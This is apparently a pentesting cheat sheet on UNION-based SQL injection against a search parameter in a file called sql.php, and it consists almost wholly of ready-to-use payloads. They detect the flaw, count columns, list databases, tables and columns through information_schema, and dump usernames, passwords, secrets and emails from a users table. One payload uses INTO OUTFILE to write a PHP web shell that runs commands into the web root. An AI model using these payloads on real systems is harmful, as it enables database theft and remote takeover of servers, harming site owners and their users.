Let's say the search page is handled by a file named sql.php, and the parameter is search. Sql.php?search=pentesting The first thing we try is to search with single quote ‘
Sql.php?search=
If it returns an error, then we know its vulnerable. Our next step is to determine the number of columns starting from running a normal query on the search box to get an idea. Finding the number of columns:
Sql.php?search=test’ ORDER BY 1-- -
OR
Sql.php?search=' ORDER BY 1--
We keep incrementing the number until we hit an error which indicates the number of columns. Then we search for something similar to that below:
Sql.php?search=pentesting’ union select
1,1,1,1,1,1,1#
OR
Sql.php?search =' and 1 = 0 union all
select 1,1,1,1,1,1,1 from
information_schema.tables where 1=0 or
1=1-- '
We continue adding ‘1’s until we don’t receive any error from the page. Only then we know how many columns by counting the ‘1’s. Then we try to find the database name, table names, columns of target table
Sql.php?search=pentesting’ union select
1,database(),@@version,1,1,1,1#
OR
Sql.php?search =' and 1 = 0 union all
select 1,database(),@@version,1,1,1,1 from
information_schema.tables where 1=0 or
1=1-- '
Sql.php?search=pentesting’ union select
1,table_name,1,1,1,1,1 from
information_schema.tables#
OR
Sql.php?search =' and 1 = 0 union all
select 1,table_name,1,1,1,1,1 from
information_schema.tables where 1=0 or
1=1-- '
Sql.php?search=pentesting’ union select
1,column_name,1,1,1,1,1 from
information_schema.columns where
table_name=’users’#
OR
Sql.php?search =' and 1 = 0 union all
select 1,column_name,1,1,1,1,1 from
information_schema.columns where
table_name = 'users'-- '
Sql.php?search=pentesting’ union select
1,login,user,password,1,1,1 from users#
OR
Sql.php?search = ' and 1=0 union all
select
1,login,password,secret,email,admin,7 from
users-- -
Sql.php?search=pentesting’ union select 1,
"<?php echo shell_exec($_GET['cmd'])?
>",1,1,1,1,1 into outfile
"/var/www/html/shell3.php"#
OR
Sql.php?search= ' and 1=0 union all select
1, "<?php echo shell_exec($_GET['cmd'])?
>",1,1,1,1,1 into outfile
"/var/www/html/shell3.php"#
Another method after finding the number of columns.
Lets say we found there are three columns, we would continue this way
searchitem=test' UNION SELECT 1,2,3-- -
searchitem=test' UNION SELECT 1,(select
group_concat(SCHEMA_NAME) from
INFORMATION_SCHEMA.SCHEMATA),3-- -
The SCHEMATA table specifically contains the names of databases MySQL knows about.
searchitem=test' UNION SELECT 1,(select
group_concat(TABLE_NAME) from
INFORMATION_SCHEMA.TABLES WHERE
TABLE_SCHEMA = 'db'),3-- -
Extracting columns in a table
searchitem=test' UNION SELECT 1,(select
group_concat(COLUMN_NAME) from
INFORMATION_SCHEMA.COLUMNS WHERE
TABLE_NAME = 'users'),3-- -
extracting specific data from a column
searchitem=test' UNION SELECT 1,(select
username from db.users),3-- -
OR
searchitem=test' UNION SELECT 1,concat(id,
':', name, ':', password)from users,3-- -
Another method to finding the number of columns and proceeding further
' UNION select 1 from
information_schema.tables #
' UNION select 1,2 from
information_schema.tables #
' UNION select 1,2,3 from
information_schema.tables #
The one that returns a correct output is the one that indicates the number of columns Proceeding
' UNION select 1,table_schema,table_name
from information_schema.tables #
' UNION select 1,table_name,column_name
from information_schema.columns #